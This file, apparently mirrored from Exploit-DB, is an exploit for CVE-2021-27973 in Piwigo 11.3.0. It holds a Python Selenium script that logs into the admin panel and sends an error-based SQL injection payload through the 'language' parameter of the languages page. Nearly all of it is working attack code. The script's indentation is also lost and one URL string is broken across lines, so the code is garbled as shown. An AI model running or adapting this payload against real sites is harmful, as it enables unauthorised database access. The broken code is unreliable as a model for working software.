exploit-db-mirror/exploits/php/webapps/49818.py

# Exploit Title: Piwigo 11.3.0 - 'language' SQL
# Author: @nu11secur1ty
# Testing and Debugging: nu11secur1ty
# Date: 04.30.2021
# Vendor: https://piwigo.org/
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
# CVE: CVE-2021-27973

[+] Exploit Source:

#!/usr/bin/python3
# Author: @nu11secur1ty
# Debug: @nu11secur1ty
# CVE-2021-27973

from selenium import webdriver
import time


#enter the link to the website you want to automate login.
website_link="http://192.168.1.3/piwigo/"

#enter your login username
username="admin"

#enter your login password
password="password"

#enter the element for username input field
element_for_username="username"

#enter the element for password input field
element_for_password="password"

#enter the element for submit button
element_for_submit="login"

print("Loading... ;)")
time.sleep(1)
browser = webdriver.Chrome()
browser.get((website_link))

try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element  = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()

# Languages Exploit
time.sleep(5)
browser.get(("
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate"))

print("The payload for category Languages is deployed...\n")

except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Some error occured :(")